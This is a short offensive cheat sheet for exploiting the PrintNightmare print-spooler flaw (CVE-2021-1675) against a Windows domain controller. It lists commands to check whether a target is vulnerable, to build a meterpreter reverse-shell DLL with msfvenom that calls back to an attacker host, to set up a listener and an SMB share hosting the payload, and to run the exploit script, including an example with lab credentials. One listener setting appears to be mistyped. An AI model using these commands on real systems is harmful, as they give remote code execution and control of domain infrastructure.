Print Nightmare

References

• cube0x0 RCE

• calebstewart LPE

Requirements

• impacket

Steps

• First check if your target is vulnerable to this exploit.

  • Run rpcdump.py @TARGET-DC-IP | egrep 'MS-RPRN|MS-PAR'

  • If you get a result similar to the following screenshot then your target is vulnerable!

• Install the latest impacket according to the instructions in cube0x0 RCE

• Get the python script from the cube0x0 RCE repo

Payload Staging

• Use msfvenom to generate the payload

  • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER-IP LPORT=5555 -f dll > shell.dll

• Fire up msfconsole

  • Use multi/handler

  • set PAYLOAD windows/x64/meterpreter/reverse_tcp

  • set LHOST=ATTACKER-IP

  • set RHOST=5555

  • run

• Setup a file share to host your shell.dll

  • smbserver.py share pwd -smb2support

Exploit

• Run the python script

  • CVE-2021-1675.py DOMAIN\USER:PASS@DC-IP '\\ATTACKER-IP\share\shell.dll'

  • Example: CVE-2021-1675.py marvel.local\fcastle:Password1@10.0.2.5 '\\10.0.2.6\share\shell.dll'